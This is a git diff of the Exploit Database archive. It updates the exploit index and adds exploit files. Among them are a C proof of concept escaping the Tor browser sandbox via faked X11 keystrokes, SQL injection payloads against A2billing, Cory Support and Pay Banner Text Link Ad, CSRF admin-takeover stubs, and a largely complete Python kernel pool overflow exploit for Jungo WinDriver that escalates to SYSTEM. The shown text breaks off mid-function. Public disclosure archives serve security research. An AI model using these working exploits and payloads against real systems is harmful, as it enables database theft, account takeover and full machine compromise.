39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39599,platforms/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0 @@ -15577,7 +15580,7 @@ id,file,description,date,author,platform,type,port 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000 -40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 +40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 @@ -15746,7 +15749,7 @@ id,file,description,date,author,platform,type,port 42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0 42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 42083,platforms/windows/remote/42083.rb,"Octopus Deploy - Authenticated Code Execution (Metasploit)",2017-05-29,Metasploit,windows,remote,0 -42084,platforms/linux/remote/42084.rb,"Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0 +42084,platforms/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote,0 42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0 42057,platforms/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,windows,remote,0 42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0 @@ -21920,7 +21923,7 @@ id,file,description,date,author,platform,type,port 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0 -9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0 +9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0 @@ -22417,7 +22420,7 @@ id,file,description,date,author,platform,type,port 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 10291,platforms/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0 -10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - Cross-Site Scripting / HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 +10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0 10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -26013,7 +26016,7 @@ id,file,description,date,author,platform,type,port 18815,platforms/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0 18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - 'author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 -18822,platforms/php/webapps/18822.txt,"PHP-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 +18822,platforms/php/webapps/18822.txt,"PHP-decoda - 'Video Tag' Cross-Site Scripting",2012-05-02,"RedTeam Pentesting",php,webapps,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0 18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0 @@ -37329,8 +37332,8 @@ id,file,description,date,author,platform,type,port 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 -40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 -40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 +40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,php,webapps,0 +40115,platforms/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,php,webapps,0 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 @@ -38062,6 +38065,7 @@ id,file,description,date,author,platform,type,port 42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0 42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0 +42621,platforms/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0 42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 @@ -38194,7 +38198,7 @@ id,file,description,date,author,platform,type,port 42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 -42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'",2017-05-25,"Google Security Research",multiple,webapps,0 +42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0 42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0 42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0 @@ -38390,13 +38394,17 @@ id,file,description,date,author,platform,type,port 42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 -42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0 +42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0 42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0 42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0 42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0 42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0 42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0 +42615,platforms/php/webapps/42615.txt,"A2billing 2.x - SQL Injection",2017-09-05,0x4148,php,webapps,0 42616,platforms/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,php,webapps,0 42617,platforms/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps,0 42618,platforms/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",php,webapps,0 42619,platforms/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps,0 +42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0 +42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0 +42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/linux/local/42626.c b/platforms/linux/local/42626.c new file mode 100755 index 000000000..c11f5b3b0 --- /dev/null +++ b/platforms/linux/local/42626.c @@ -0,0 +1,94 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2 + +**EDIT: I mixed up two different sandboxes; see the comment below for a correction.** + +From inside the Linux sandbox described in +, it is +still possible to talk to the X server without any restrictions. +This means that a compromised browser can e.g. use the +XTEST X protocol extension +() to +fake arbitrary keyboard and mouse events, directed at arbitrary +windows. This permits a sandbox breakout, e.g. by injecting keypresses +into a background window. + + +mentions that the X server is reachable, but it sounds like the author +didn't realize that a normal connection to the X server permits +sandbox breakouts by design. + +To reproduce: + +Install Debian Jessie with the Xfce4 desktop environment and with +backports enabled. +Install bubblewrap and xdotool. +Install the sandboxed Tor browser from +. +Launch the sandboxed Tor browser, use the default configuration. When +the browser has launched, close it. +Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox. +Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c: + +========================= +*/ +#include +#include + +int main(void){ + int status; + setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1); + if (fork() == 0) { + execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL); + perror("fail"); + return 0; + } + wait(&status); + if (fork() == 0) { + execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL); + perror("fail"); + return 0; + } + wait(&status); + if (fork() == 0) { + execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL); + perror("fail"); + return 0; + } + wait(&status); + while (1) sleep(1000); + return 0; +} + +/* +========================= + +In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run +"gcc -static -o firefox firefox.c". +Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/". +Now run the launcher for the sandboxed browser again. Inside the +sandbox, the new firefox binary will connect to the X11 server and +send fake keypresses to open a terminal outside the sandbox and type +into it. + +There are probably similar issues with pulseaudio when it's enabled; +I suspect that it's possible to e.g. use the pulseaudio socket to load +pulseaudio modules with arbitrary parameters, which would e.g. permit +leaking parts of files outside the sandbox by using them as +authentication cookie files for modules that implement audio streaming +over the network. + + +################################################################### + +I mixed up two sandboxes. + +The blog post talks about the Firefox content process sandbox, which is still in development and unrelated to the Tor-specific sandbox I looked at. So the "content sandboxing" the blog post talks about isn't very effective yet; the Mozilla wiki points to multiple bug lists that document the remaining work (https://wiki.mozilla.org/Security/Sandbox#Bug_Lists). + +The sandbox I looked at here is written and distributed by the Tor Project. + + +https://gitweb.torproject.org/tor-browser/sandboxed-tor-browser.git/commit/?id=1bfbd7cc1cd60c9468f2e33a3d4816973f1fb2f5 was added to mitigate the issue I reported by filtering X11 traffic and whitelisting permitted X protocol extensions. + +More warnings have been added to the corresponding documentation (https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux?action=diff&version=23&old_version=21) that point out that this sandbox should not be used without manually configuring nested X11 and that pulseaudio is unsafe. +*/ \ No newline at end of file diff --git a/platforms/linux/remote/10.c b/platforms/multiple/remote/10.c similarity index 100% rename from platforms/linux/remote/10.c rename to platforms/multiple/remote/10.c diff --git a/platforms/php/webapps/42615.txt b/platforms/php/webapps/42615.txt new file mode 100755 index 000000000..40d05e755 --- /dev/null +++ b/platforms/php/webapps/42615.txt @@ -0,0 +1,45 @@ +# Title : A2billing 2.x , Sql injection vulnerability +# Vulnerable software : A2billing 2.x +# Author : Ahmed sultan (0x4148) +# Email : 0x4148@gmail.com +# Linkedin : https://www.linkedin.com/in/0x4148/ + +If you're looking for deep technical stuff , overcoming sanitization/hardening . . etc you can check out the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/ + +A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID +The sanitization proccess differ from version to another , but the concept is the same , +I demonstrated bypassing the last version (2.1.1) , but still all versions till the moment are vulnerable as well with just little bit different modifications + +File : agent/public/checkout_process.php +getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency', +'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency', +'transaction_id', 'mc_fee', 'card_number')); +................................................... +// Status - New 0 ; Proceed 1 ; In Process 2 +$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner, +cc_number, cc_expires, creationdate, status, cvv, credit_card_type, +currency " . +" FROM cc_epayment_log_agent " . +" WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND +$NOW_2MIN))"; +$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY); + + +POC : +Sending POST request : transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268 +to : https://HOST/a2billing/agent/Public/checkout_process.php +will result in redirection of the application and the Location header will contain our decoded payment module which was used in the query "plugnpay" , which indicate successful injection + +Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA + + +Exploit timeline : +01/10/2016 : vulnerability reported to vendor +06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP +04/09/2017 : Public release + +Full exploit code is attached + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42615.zip + +Thanks fly to R1z clan :) \ No newline at end of file diff --git a/platforms/php/webapps/42620.txt b/platforms/php/webapps/42620.txt new file mode 100755 index 000000000..d7ce73a64 --- /dev/null +++ b/platforms/php/webapps/42620.txt @@ -0,0 +1,38 @@ +# Exploit : Cory Support (pr) SQL Injection Vulnerability +# Author : v3n0m +# Contact : v3n0m[at]outlook[dot]com +# Date : September, 06-2017 GMT +7:00 Jakarta, Indonesia +# Developer : Cory App +# Software : Cory Support +# App Link : http://coryapp.com/?product&index +# Demo : http://coryapp.com/demo/support/ +# Tested On : Mac OS Sierra v10.12.6 +# Credits : YOGYACARDERLINK, Dhea Dayanaya Fathin Karima, Don't Touch Me (Line Group) & Muhammad Panji, Alfath Dirk, Cafe BMW & YOU !! + +1. Description + +An attacker can exploit this vulnerability to read from the database. +The parameter 'pr' is vulnerable. + + +2. Proof of Concept + +http://domain.tld/[path]/listfaq.php?pr=9999+and+1=2+union+all+select+null,version()-- + +# Exploitation via SQLMap + +Parameter: pr (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pr=1 AND 4809=4809 + Vector: AND [INFERENCE] + + Type: UNION query + Title: Generic UNION query (NULL) - 2 columns + Payload: pr=1 UNION ALL SELECT NULL,CONCAT(0x7170706271,0x564f724b4475754c4c7a48714c59464c6c43704a636c6f72444471767a79716a6b6d4d6a72654b76,0x7170626b71)-- RNyi + Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT] + + +3. Security Risk + +The security risk of the remote sql-injection web vulnerability in the Cory Support is estimated as high. \ No newline at end of file diff --git a/platforms/php/webapps/42621.html b/platforms/php/webapps/42621.html new file mode 100755 index 000000000..ecb4ad4e6 --- /dev/null +++ b/platforms/php/webapps/42621.html @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin User&Pass) +# Dork: N/A +# Date: 06.09.2017 +# Vendor Homepage: http://www.dijiteol.com/ +# Software Link: http://www.dijiteol.com/p-Advertiz-PHP-Script--No-Accounts-Required--i-2.html +# Demo: http://dijiteol.com/demos/advertiz/ +# Version: 0.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# +# Proof of Concept: + + +
+ + + + + +
+ + +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42622.html b/platforms/php/webapps/42622.html new file mode 100755 index 000000000..e5c5daf3e --- /dev/null +++ b/platforms/php/webapps/42622.html @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin User&Pass) +# Dork: N/A +# Date: 06.09.2017 +# Vendor Homepage: http://www.dijiteol.com/ +# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html +# Demo: http://dijiteol.com/demos/pbtla +# Version: 1.0.6.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# +# Proof of Concept: + + +
+ + + + + +
+ + +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42623.txt b/platforms/php/webapps/42623.txt new file mode 100755 index 000000000..d3c83a162 --- /dev/null +++ b/platforms/php/webapps/42623.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - SQL Injection +# Dork: N/A +# Date: 06.09.2017 +# Vendor Homepage: http://www.dijiteol.com/ +# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html +# Demo: http://dijiteol.com/demos/pbtla +# Version: 1.0.6.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?action=stats&id=[SQL] +# +# http://localhost/[PATH]/index.php?action=previewad&id=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/unix/remote/22356.c b/platforms/unix/remote/22356.c index 56d40f270..27b006f88 100755 --- a/platforms/unix/remote/22356.c +++ b/platforms/unix/remote/22356.c @@ -1,7 +1,8 @@ /* source: http://www.securityfocus.com/bid/7106/info -Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets. +Samba is prone to a buffer-overflow vulnerability when the ' +' service tries to reassemble specially crafted SMB/CIFS packets. An attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values. diff --git a/platforms/windows/local/42624.py b/platforms/windows/local/42624.py new file mode 100755 index 000000000..dba99c3cc --- /dev/null +++ b/platforms/windows/local/42624.py @@ -0,0 +1,410 @@ +# -*- coding: utf-8 -*- +""" +Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability + +Download: http://www.jungo.com/st/products/windriver/ +File: WD1240.EXE +Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba +Driver: windrvr1240.sys +Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad +CVE: CVE-2017-14153 +Author: Steven Seeley (mr_me) of Source Incite +Affected: <= v12.4.0 +Thanks: b33f, ryujin and sickness +Analysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html + +Summary: +======== + +This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. + +The specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel. + +Timeline: +========= + +2017-08-22 – Verified and sent to Jungo via sales@/first@/security@/info@jungo.com +2017-08-25 – No response from Jungo and two bounced emails +2017-08-26 – Attempted a follow up with the vendor via website chat +2017-08-26 – No response via the website chat +2017-09-03 – Recieved an email from a Jungo representative stating that they are "looking into it" +2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release +2017-09-06 – No response from Jungo +2017-09-06 – Public 0day release of advisory + +Example: +======== + +C:\Users\Guest\Desktop>icacls poc.py +poc.py NT AUTHORITY\Authenticated Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(F) + Mandatory Label\Low Mandatory Level:(I)(NW) + +Successfully processed 1 files; Failed processing 0 files + +C:\Users\Guest\Desktop>whoami +debugee\guest + +C:\Users\Guest\Desktop>poc.py + + --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] + Steven Seeley (mr_me) of Source Incite + +(+) spraying pool with mixed objects... +(+) sprayed the pool! +(+) making pool holes... +(+) made the pool holes! +(+) allocating shellcode... +(+) allocated the shellcode! +(+) triggering pool overflow... +(+) allocating pool overflow input buffer +(+) elevating privileges! +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Guest\Desktop>whoami +nt authority\system + +C:\Users\Guest\Desktop> +""" +from ctypes import * +from ctypes.wintypes import * +import struct, sys, os, time +from platform import release, architecture + +ntdll = windll.ntdll +kernel32 = windll.kernel32 +MEM_COMMIT = 0x00001000 +MEM_RESERVE = 0x00002000 +PAGE_EXECUTE_READWRITE = 0x00000040 +STATUS_SUCCESS = 0x0 +STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 +STATUS_INVALID_HANDLE = 0xC0000008 +SystemExtendedHandleInformation = 64 + +class LSA_UNICODE_STRING(Structure): + """Represent the LSA_UNICODE_STRING on ntdll.""" + _fields_ = [ + ("Length", USHORT), + ("MaximumLength", USHORT), + ("Buffer", LPWSTR), + ] + +class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): + """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" + _fields_ = [ + ("Object", c_void_p), + ("UniqueProcessId", ULONG), + ("HandleValue", ULONG), + ("GrantedAccess", ULONG), + ("CreatorBackTraceIndex", USHORT), + ("ObjectTypeIndex", USHORT), + ("HandleAttributes", ULONG), + ("Reserved", ULONG), + ] + +class SYSTEM_HANDLE_INFORMATION_EX(Structure): + """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" + _fields_ = [ + ("NumberOfHandles", ULONG), + ("Reserved", ULONG), + ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), + ] + +class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): + """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" + _fields_ = [ + ("Name", LSA_UNICODE_STRING), + ("Reserved", ULONG * 22), + ] + +class PROCESSENTRY32(Structure): + _fields_ = [ + ("dwSize", c_ulong), + ("cntUsage", c_ulong), + ("th32ProcessID", c_ulong), + ("th32DefaultHeapID", c_int), + ("th32ModuleID", c_ulong), + ("cntThreads", c_ulong), + ("th32ParentProcessID", c_ulong), + ("pcPriClassBase", c_long), + ("dwFlags", c_ulong), + ("szExeFile", c_wchar * MAX_PATH) + ] + +Process32First = kernel32.Process32FirstW +Process32Next = kernel32.Process32NextW + +def signed_to_unsigned(signed): + """ + Convert signed to unsigned integer. + """ + unsigned, = struct.unpack ("L", struct.pack ("l", signed)) + return unsigned + +def get_type_info(handle): + """ + Get the handle type information to find our sprayed objects. + """ + public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() + size = DWORD(sizeof(public_object_type_information)) + while True: + result = signed_to_unsigned( + ntdll.NtQueryObject( + handle, 2, byref(public_object_type_information), size, None)) + if result == STATUS_SUCCESS: + return public_object_type_information.Name.Buffer + elif result == STATUS_INFO_LENGTH_MISMATCH: + size = DWORD(size.value * 4) + 